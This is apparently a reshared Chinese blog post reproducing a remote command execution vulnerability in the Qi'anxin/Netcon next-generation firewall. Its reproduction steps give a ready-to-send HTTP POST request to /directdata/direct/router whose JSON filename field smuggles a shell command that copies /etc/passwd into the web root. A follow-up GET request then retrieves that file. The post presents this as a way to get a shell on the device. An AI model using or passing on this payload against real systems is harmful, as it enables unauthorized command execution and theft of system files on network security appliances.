奇安信 网康下一代防火墙 RCE 可直接getshell

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

网康下一代防火墙(NGFW)是一款可以全面应对应用层威胁的高性能防火墙。通过深入洞察网络流量中的用户、应用和内容,并借助全新的高性能单路径异构并行处理引擎,NGFW能够为用户提供有效的应用层一体化安全防护,帮助用户安全地开展业务并简化用户的网络安全架构。

存在远程命令执行,漏洞攻击者可以获取服务器权限。

0x03 漏洞复现

1、进入登录页面抓包

图片[1]-奇安信 网康下一代防火墙 RCE 可直接getshell-安全小天地
图片[2]-奇安信 网康下一代防火墙 RCE 可直接getshell-安全小天地

2、构造数据包

变更发包方式:POST /directdata/direct/router HTTP/1.1

添加POST数据:

{\"action\":\"SSLVPN_Resource\",\"method\":\"deleteImage\",\"data\":[{\"data\":[\"/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt\"]}],\"type\":\"rpc\",\"tid\":17,\"f8839p7rqtj\":\"=\"}
图片[3]-奇安信 网康下一代防火墙 RCE 可直接getshell-安全小天地

3、继续 构造数据包

变更发包方式:GET /test.txt HTTP/1.1

图片[4]-奇安信 网康下一代防火墙 RCE 可直接getshell-安全小天地

批量验证脚本

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容